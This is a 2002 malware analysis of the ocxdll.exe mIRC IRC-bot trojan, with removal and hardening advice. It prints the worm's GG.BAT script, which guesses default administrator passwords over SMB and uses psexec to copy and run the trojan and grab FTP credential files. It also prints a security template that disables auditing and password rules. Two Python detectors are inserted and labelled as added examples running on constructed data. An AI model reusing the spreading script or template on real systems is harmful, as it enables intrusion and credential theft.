mIRC (port 445) Trojan Analysis
mIRC Virus / Worm / Trojan Analysis (ocxdll.exe, Taskmngr.exe, mdm.exe, "HideWindows Error")
URL of this article is: http://www.klcconsulting.net/mirc_virus_analysis.htm
KLC Consulting Security Team believes that this is a prototype, and the start of the malicious IRC BotNet Distributed Denial of Service (DDoS) revolution from the bad guys. This article will give you a fundamental understanding of how IRC-type BotNet DDoS Trojans spread themselves so quickly ...
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
- ocxdll.exe / mIRC Trojan Analysis Part 1
- ocxdll.exe / mIRC Trojan Analysis Part 2
- Trojan Removal and Protection tools
- Trojan Files List
- An analysis on another IRC worm/Trojan (Deloder), more malicious than ocxdll.exe
ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 1:
More Analysis on ocxdll.exe virus: v. 1.1
Kyle Lai, CISSP, CISA
This is an SMB over TCP attack using port 445. It looked for weak administrator IDs and passwords on the local Windows 2000 systems.
One of my clients also got infected with the ocxdll.exe virus. After some detailed analysis, I determined that it was a Trojan. I deleted the detected registry entries, deleted the infected files, tightened the local administrator ID and password, restored the security policy by running "secedit.exe /configure" (from Microsoft) (if you have a backup .sdb file, simply reapplying the security policy fixes this part), and added users/groups back to the "Access this computer from the network" policy. The cause was bad security (admin ID and passwords) and firewall configuration, and possibly a backdoor.
- Windows 2000, XP (same port, 445, but not tested yet). Security policy alteration was ONLY observed on Windows 2000 (and maybe on XP).
- Windows NT - might be infected as the "root problem" to spread the Trojan, but it will not get this Trojan based on its re-distribution method. You probably want to look into this system to determine if there are any backdoors, Trojans, or if this system was compromised in any way. It will not change security policies.
What did it do?
1. Hid all programs it ran.
2. Ran the mIRC client with random usernames listed in mdm.scr, padded with more random characters.
3. Opened a backdoor on port 60609.
4. Ran the bot (robot) scripts in the following order, which means they contained malicious automated instructions.
5. Replaced security policy settings using the Microsoft security editor (SecEdit.exe /configure) command: it reset the security policy to default settings and replaced some additional security settings using the TFTP8675 file. This is done in quiet mode, so it probably only flashed the command line window very quickly.
6. Scanned for 25 IP's and then started running "GG.BAT". GG.BAT is the REAL program that started the hacking.
7. Tried to hack into the system using the following user IDs and passwords. If you don't have these user IDs and passwords, maybe you are just infected on 1 system, and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator IDs and passwords, then probably these systems were hacked successfully. It copied the Trojan OCXDLL.EXE to the compromised systems. If the file was already there, it copied it anyway, and did it quietly (using psexec.exe -c -f -d).
9. Ran OCXDLL.EXE without any delay (psexec.exe -d), which extracted the 17 files that are in this self-extracting file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and "c:\progra~1\ws_ftp\ws_ftp.ini" to (maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc client.
12. The scripts kicked in to HIDE the mIRC window, so you can ONLY see it in the process list. You will see "taskmngr.exe" (NOT taskmgr.exe, which is the REAL task manager).
13. xvpll.hlp reports Trojan status back to the hacker: either attempt failed or attempt successful.
Disclaimer: The IRC bot scripts have not been fully analyzed. This is what I understood so far. The removal instructions WILL remove the Trojan.
This may be a random attack. However, there is a file, ncp.exe, involved, which is the NetCat program. This program allows the hackers to gain full control of your system.
1. Best-case scenario is that it was a random attack by the Trojans, and no sensitive data were lost. Your systems may be used as a zombie for Distributed Denial of Service attacks.
2. Worst-case scenario is that they have controlled your system and implemented something new that is not yet detected.
3. The hacker has captured your IP address and knows that you were vulnerable, because the Trojan actually reported back to him/her. They have the account they successfully compromised, and they *could* possibly have gotten a copy of the users and passwords on that system, and *maybe* the credit card info if you shop online.
How to remove the Trojan:
1. Delete the files that were extracted from ocxdll.exe, plus ocxdll.exe and dll16.ini (created when running mirc.exe)
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
seced.bat is a decoy. This file was never used. The real instruction for updating the configuration was mentioned in item #5. v.exe is actually srvany.exe, which is another decoy. It was never used.
2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run: remove "taskmngr.exe" (this starts the mIRC client program during Windows startup)
3. Change the LOCAL Administrator password on ALL systems! This includes Windows 2000 PROFESSIONAL! Make sure the new passwords are strong passwords! Use a mix of uppercase, lowercase, numbers, and non-alphanumeric characters, i.e. _,+,=,), ? for your new passwords, and make sure the passwords are NOT similar to the administrator ID in any way. For example, "Administrator123" is a very bad password, even though it has mixed case and alphanumeric characters.
4. If possible, change Administrator login ID to a different user_id. This will stop the initial user_id guessing. (This will not stop the more sophisticated hackers)
5. Restore the default security policy by restoring the basic Microsoft default security template. The following instructions for restoring the basic default security template are from the USENET posting by Edward Alfert (firstname.lastname@example.org) under the topic "Solution to mIRC and Secedit Virus Networking Problems." in microsoft.public.scripting.virus.discussion. More info on Microsoft Security Configuration and Analysis can be found at
Here are the instructions from Edward Alfert.
1) use the backup security database template to restore the system to its original microsoft defaults. (NOTE...if you upgrade from a previous OS, this default may not be the default you are used to)...
Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log /verbose
2) copy /winnt/security/database/secedit.sdb to /winnt/security/database/secedit-check.sdb
you need to do this because you can't run step #3 against the original secedit.sdb
3) click on start, run, type mmc and click ok
4) click Console menu, then Add/Remove Snap-In
5) click Add, then double click on "Security and Configuration Analysis" and "Security Templates", then click close, and ok.
6) right click on "security and configuration analysis" and click on "open database"... browse to /winnt/security/database/secedit-check.sdb and select it.
7) right click on "security and configuration analysis" and select "analyze computer now"
8) browse through the directory structure and you will see that the computer is currently configured differently..
Make changes as appropriate for your environment. For example, a very important option that is probably missing (as caused by the trojan) is that nobody is allowed to logon to the computer via the network.
6. Go to Start -> Programs -> Administrative Tools -> Local Security Policy, click on "User Rights Assignments", and add users and groups back into the "Access this computer from the network" policy. The default setting is:
c. BACKUP OPERATORS
d. POWER USERS
g. IUSR_[ SYSTEM_NAME]
7. You MUST go through the security policies and make sure proper access was restored. You or some of your applications might have had specific rights settings prior to the compromise, and the user/group privileges/rights need to be reset if necessary.
8. You probably have seen a strange SID that was added by the trojan in the "Logon Locally" policy. Remove the user SID. The SID there does NOT mean the trojan created a user. It was in the security template on TFTP8675 file. You can see it on the bottom of this document.
1. Tighten your Firewall and lock down the ports and ACL, BOTH inside to outside, and outside to inside. Make sure port TCP/UDP 445 is blocked both inbound and outbound on the firewall.
2. If possible, Rename your administrator user id to something else, and create a user id called "Administrator" with NO GROUPS associated with it. This will allow you to monitor anyone from trying to use the "Administrator" login.
3. Set up the security event log. Log successful and failed Logon/Logoff to audit system access. Make sure to monitor the
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run (this starts the mIRC client program during Windows startup). When the mIRC client started running, it ran the scripts in dll32nt.hlp, which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+tftp8675 /quiet". This meant "configure your system settings with the existing security policy in secedit.sdb, plus the additional settings in tftp8675". It basically removed many security restrictions, removed all auditing for the system, and of course removed all users from the "Access this computer from the network" right.
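Item 3 above recommends logging successful and failed logons; the credential guessing this Trojan performs leaves a recognizable trace in that log. The following detector is an added example, not part of the original article: it reads constructed Windows 2000-style security log records (event 529 = logon failure, 528 = success, logon type 3 = network) in an assumed comma-separated layout and flags a burst of network logon failures for the worm's hard-coded accounts from one source, escalating when a success follows.

```python
"""Flag the logon pattern the worm's GG.BAT produces on a target.
Added example (not the page's own code); log lines and field layout are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

WORM_ACCOUNTS = {"administrator", "root", "admin"}  # accounts tried by GG.BAT
FAILURE, SUCCESS = 529, 528                         # NT/2000 security log event IDs
NETWORK_LOGON = 3                                   # logon type for SMB/network logons
WINDOW = timedelta(seconds=60)                      # how close failures must be
MIN_FAILURES = 2                                    # failures needed to call it guessing

# Constructed sample records: time,event_id,account,logon_type,source_workstation
SAMPLE_LOG = """\
2002-08-29 10:01:02,529,administrator,3,WS-17
2002-08-29 10:01:02,529,administrator,3,WS-17
2002-08-29 10:01:03,529,root,3,WS-17
2002-08-29 10:01:03,528,admin,3,WS-17
2002-08-29 10:05:00,529,jsmith,2,FILESRV
2002-08-29 10:30:00,529,administrator,3,WS-22
"""

def parse_log(text):
    """Turn the assumed CSV layout into (time, event_id, account, logon_type, source)."""
    rows = []
    for line in text.splitlines():
        ts, eid, account, ltype, source = line.split(",")
        rows.append((datetime.fromisoformat(ts), int(eid), account.lower(), int(ltype), source))
    return rows

def detect_spread(rows):
    """Return {source: verdict}. 'guessing' = burst of network logon failures for the
    worm's accounts; 'compromised' = a success for one of those accounts follows the burst."""
    by_source = defaultdict(list)
    for row in rows:
        if row[3] == NETWORK_LOGON and row[2] in WORM_ACCOUNTS:
            by_source[row[4]].append(row)
    verdicts = {}
    for source, events in by_source.items():
        events.sort()
        failures = [e for e in events if e[1] == FAILURE]
        for i, first in enumerate(failures):
            burst = [f for f in failures[i:] if f[0] - first[0] <= WINDOW]
            if len(burst) >= MIN_FAILURES:
                verdicts[source] = "guessing"
                last = burst[-1][0]
                if any(e[1] == SUCCESS and first[0] <= e[0] <= last + WINDOW for e in events):
                    verdicts[source] = "compromised"
                break
    return verdicts

if __name__ == "__main__":
    for src, verdict in detect_spread(parse_log(SAMPLE_LOG)).items():
        print(f"{src}: {verdict}")
```

The single failure from WS-22 and the interactive failure for jsmith are ignored; only WS-17, whose failures for administrator and root are followed by a success for admin, is reported as compromised.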
OCXDLL.EXE is a self-extracting file that included 17 files. It is a Trojan/worm. In dll32nt.hlp, it has an instruction to do an IP scan and store the 25 IP addresses it found. Most likely it scanned the subnet and the file servers that were connected to the compromised system at that time. Then the Trojan has an instruction at the end to run GG.BAT, which is the instruction to attack the 25 IP's it just found. Then the process started all over again.
Here are the files that were extracted from
Here is the GG.BAT text:
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
psexec \\%1 -d taskmngr.exe
From Sysinternals, here is the description of what the PSEXEC parameters do:
-c = Copy the specified program to the remote system for execution. If you omit this option then the application must be in the system's path on the remote system.
-f = Copy the specified program to the remote system even if the file already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for non-interactive applications.
List from TFTP8675:
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551
secreatepagefileprivilege = *S-1-5-32-544
sedebugprivilege = *S-1-5-32-544
seincreasebasepriorityprivilege = *S-1-5-32-544
seincreasequotaprivilege = *S-1-5-32-544
seloaddriverprivilege = *S-1-5-32-544
senetworklogonright = Microsoft
seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547
seremoteshutdownprivilege = *S-1-5-32-544
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551
sesecurityprivilege = *S-1-5-32-544
sesystemenvironmentprivilege = *S-1-5-32-544
sesystemprofileprivilege = *S-1-5-32-544
sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547
setakeownershipprivilege = *S-1-5-32-544
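The template above shows the three kinds of damage this Trojan did to the security policy: password policy zeroed, every audit category switched off, and user rights rewritten (an account name instead of a SID in senetworklogonright, and the Guest SID added to seinteractivelogonright as described in Part 2). The following checker is an added example, not code from the article: it parses a secedit-style template in the flat "key = value" form shown here and reports those three conditions; the sample template and the minimum password values used as a baseline are constructed.

```python
"""Audit a secedit-style security template for the weakening TFTP8675 performed.
Added example (not the page's own code); sample values and baseline are constructed."""
import re

# Constructed sample in the flat "key = value" form the article prints.
SAMPLE_TEMPLATE = """
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
AuditLogonEvents = 0
AuditAccountLogon = 0
AuditPolicyChange = 0
senetworklogonright = Microsoft
seinteractivelogonright = *S-1-5-21-1960408961-1637723038-1801674531-501
sedebugprivilege = *S-1-5-32-544
"""

# Assumed minimums a hardened Windows 2000 system should keep.
PASSWORD_MINIMUMS = {
    "MinimumPasswordLength": 8,
    "PasswordComplexity": 1,
    "PasswordHistorySize": 1,
    "LockoutBadCount": 1,
}
SID_RE = re.compile(r"^\*S-1-\d+(?:-\d+)*$")   # secedit writes SIDs with a leading '*'
GUEST_RID = "501"                               # relative ID of the built-in Guest account

def parse_template(text):
    """Return {key: value} for every 'key = value' line (keys kept as written)."""
    entries = {}
    for line in text.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries[key.strip()] = value.strip()
    return entries

def audit_template(entries):
    """Return (key, reason) findings for weakened password policy, disabled
    auditing, and suspicious user-rights assignments (se* keys)."""
    findings = []
    for key, value in entries.items():
        if key in PASSWORD_MINIMUMS and value.isdigit() and int(value) < PASSWORD_MINIMUMS[key]:
            findings.append((key, f"weakened: {value} < {PASSWORD_MINIMUMS[key]}"))
        elif key.startswith("Audit") and value == "0":
            findings.append((key, "auditing disabled"))
        elif key.lower().startswith("se"):          # user-rights assignment
            for account in (a.strip() for a in value.split(",")):
                if not SID_RE.match(account):
                    findings.append((key, f"non-SID principal {account!r}"))
                elif account.rsplit("-", 1)[1] == GUEST_RID:
                    findings.append((key, "Guest account (RID 501) granted right"))
    return findings

if __name__ == "__main__":
    for key, reason in audit_template(parse_template(SAMPLE_TEMPLATE)):
        print(f"{key}: {reason}")
```

Running it against a template exported from a clean system (secedit /export) gives a quick way to confirm that the defaults from step 5 of the removal instructions were actually restored.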
ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 2:
More Analysis on IRC Virus/Trojan Part 2: By
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
First of all, I want to say that I have nothing against Microsoft. I am just presenting my analysis.
This analysis is based on my examination of the IRC Trojan/virus as referenced in Microsoft Knowledge Base Article - Q328691; however, I am not to be held responsible for the information provided. Also, I have not researched any of the previous IRC/flood Trojan/viruses; therefore, I am not knowledgeable in all aspects of that topic. If you think the information in this posting is not accurate, please send me an email.
This IRC Trojan/virus is vaguely similar to the earlier IRC/flood Trojan/virus. However, this time it takes advantage of weak computer systems security and performs a denial of service (DoS) attack. The vulnerability is typically caused by the lack of corporate security awareness.
Just some comments to Microsoft's response:
1. It uses port 445, which is SMB over TCP for attack. It doesn't use port 139, so NT4 is not vulnerable to this particular Trojan. However, port 139 is another typical hackers' target. Make sure your firewall is locked down. If you don't have a firewall, get one!
2. OCXDLL.EXE is a self-extracting executable containing 17 files. To totally remove the Trojan, you can read my original analysis where I listed all the files that are
Again, I can't tell if any files were added/deleted by the hackers for all of you out there. Reason: Once the hacker(s) compromised your machine(s), they own your entire system(s).
3. ncp.exe was included in ocxdll.exe. ncp.exe is actually the NetCat program, which is one of hackers' favorite tools. Microsoft did not identify this tool.
4. mt.exe was another program that requires cygwin.dll. If you use a Linux emulator via Cygwin, then this file would exist on your system.
In discussion with Symantec, one analyst said "mt.exe is just a rather old Unix bot named knight.c that has been recompiled to use cygwin and run on Windows. This is basically a DDoS bot." However, I cannot confirm this because I have never dealt with it before. In the scripts, I did not see any evidence of mt.exe being called; however, I wouldn't rule out the hacker having executed this program remotely.
5. Microsoft said in the article Q328691 "NOTE: Paths to the files are not listed because they may vary." This statement is correct; however, probably 99% (just a guess) of the people set up with the default Windows 2000 configuration, which will leave you at "\WINNT\SYSTEM32", or. I suspect that ocxdll.exe was copied to the folder where "services.exe" is located, because when I tried to run psexec.exe similarly to the ones in the script, it started the process "services.exe" on the remote system, followed by "psexesvc.exe", then followed by "services.exe". Guys, I didn't have time to try it out, and if you can, keep me updated with your test results. I can't find psexesvc.exe on my system though? PSEXEC.EXE can be downloaded from Sysinternals. (http://www.sysinternals.com/ntw2k/freeware/psexec.shtml)
a. Download psexec.exe and save it at c:\test\.
b. Create a file called c:\test\test.bat with the following 2 lines Echo done testing > test-1.txt
c. Type ( Net Use \\[computer_ip]\IPC$ "[password]" /user:[administrator id]) to connect to the remote computer as a system admin.
d. Type in "psexec \\[remote-system] -f -c -d test.bat -o" (to examine where the files are copied to.)
e. Goto remote system, "cd %systemroot%\system32", search for test*.* and you should find:
f. Open test-1.txt, and you will see the following line in the file, which proves that "test.bat" has been executed: "done testing"
g. This showed basically how psexec.exe works, and how dangerous it can be in a hacker's hands: psexec.exe copied the test.bat file over to the remote system, and then executed it right after it was copied.
6. It tried to create a file list of each file type with the following format: .MPG, .AVI, .ASF, .RAR, .ZIP, .CUE. These instructions are in httpsearch.ini. Since the machines I examined have this file extracted from ocxdll.exe in 8.3 format ("httpsear.ini"), I don't believe this script was executed. Therefore, I did not see files
You probably want to check these files anyway though?
7. In my previous analysis is the content of TFTP8675, which was the actual security template that was applied to the security settings. This template actually changed user permissions/rights policies. There are 3 major discoveries:
a. If you compare the Basic Microsoft default templates that ship with Windows 2000, this hacker used the exact basic Microsoft template, but added the [Permission Rights] section of the security template.
b. It tries to assign Guest the right to "logon locally". The entry was (seinteractivelogonright = *S-1-5-21-1960408961-1637723038-1801674531-501). This is the Guest user SID it tried to add to the system ("501" in the last section of the SID indicates the Guest account). On the systems I examined, the SID value did not change when it was spreading, which meant guest accounts were not added successfully.
c. The part where it replaced the "Access this computer from the network" policy is (senetworklogonright = Microsoft). I noticed that the designer of this Trojan/virus/malware used SIDs to assign user rights everywhere except this one? I think he/she is trying to make a point (?)
I don't think there can be a conclusion on what's lost if the systems were compromised. However, we can be sure that port 445 is open on many Windows 2000 and XP systems out there, which are not protected, and a lot of people out there are not security conscious on their Windows 2000 and XP systems, which require a little bit more technical skills to lock down the systems.
I highly recommend that system administrators follow the Microsoft security guidelines on hardening their Windows-based environment.
I would also suggest that everyone infected by a Trojan/virus run some anti-Trojan programs in addition to the anti-virus software, such as Anti-Trojan (http://www.anti-Trojan.net), Pest Patrol (http://www.pestpatrol.com), and others, to ensure there are NO Trojan/hacker tools on your systems, which are sometimes missed by anti-virus programs.
Besides anti-Trojan software, you probably should run something like Ad-Aware (http://www.lavasoftusa.com/) to remove the adware that was downloaded unintentionally while you were surfing the web.
I hope "Internet Security" is not oxymoron.
Here are some free software utilities that can help you fight the Trojan and intrusions. If you use these utilities, make sure you get the latest updates regularly:
1. Make sure you have the latest Anti-Virus definitions that downloaded from your anti-virus software vendor. If you don't have one, here is a free one: http://www.grisoft.com
2. Make sure you get anti-Trojan software on top of the anti-virus software. Much anti-virus software does not detect Trojans and hacker software that was installed during an intrusion. Anti-virus software does not detect hacker software because it could be used legitimately by security professionals... A free and great one is Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html
3. Get Ad-Aware software, which is for removing advertising software that web advertisers install on your systems without your acknowledgement while you are surfing the Web... This is free software too: http://www.lavasoftusa.com/software/adaware/
4. Get a firewall for your computers if you do not have one. Here is a very simple to use firewall software: http://www.zonealarm.com
This particular mIRC Virus/Trojan spread across the world around the end of August, 2002.
Based on the information from the victims, a variant of the original OCXDLL.EXE attacked again around October 23, 2002 and November 13, 2002.
I have heard there is a new variant out there, and the new name for taskmngr.exe is now TASK32.EXE (as of 11/13/2002). This was reported by several victims in the newbie.org taskmngr.exe discussion group I participated in.
This virus took advantage of Microsoft SMB over TCP (Port 445), which uses NetBIOS names. It attempted to spread to Windows 2000 Professional, Windows 2000 Server and possibly Windows XP systems with weak and guessable administrator accounts and passwords:
(passwords used by DeLoder-A worm/Trojan)
Microsoft got caught up with the original OCXDLL.EXE Virus/Trojan and issued a "Hacker on 8/30/2002. The original Microsoft analysis was very vague and it got heavily criticized by the public. Microsoft re-issued the analysis titled "MIRC Trojan-Related Attack Detection and Repair" on 9/6/2002 and removed the original article. Below are some of the references regarding this mIRC Virus/Trojan/Malware.
I am still helping out in the discussion group: newbie.org under "Taskmngr.exe". There you can see the discussion and track the Trojan variants.
Additional resources on recovery:
Trojan Ports list:
Compromised Computer Identification and Fixing Guidelines by Allen Chang at UC Berkeley
Additional resources on Trojan Horse:
mIRC Trojan Variants:
IETF Assigned Ports:
Copyright © 2002-2011 KLC
All rights reserved.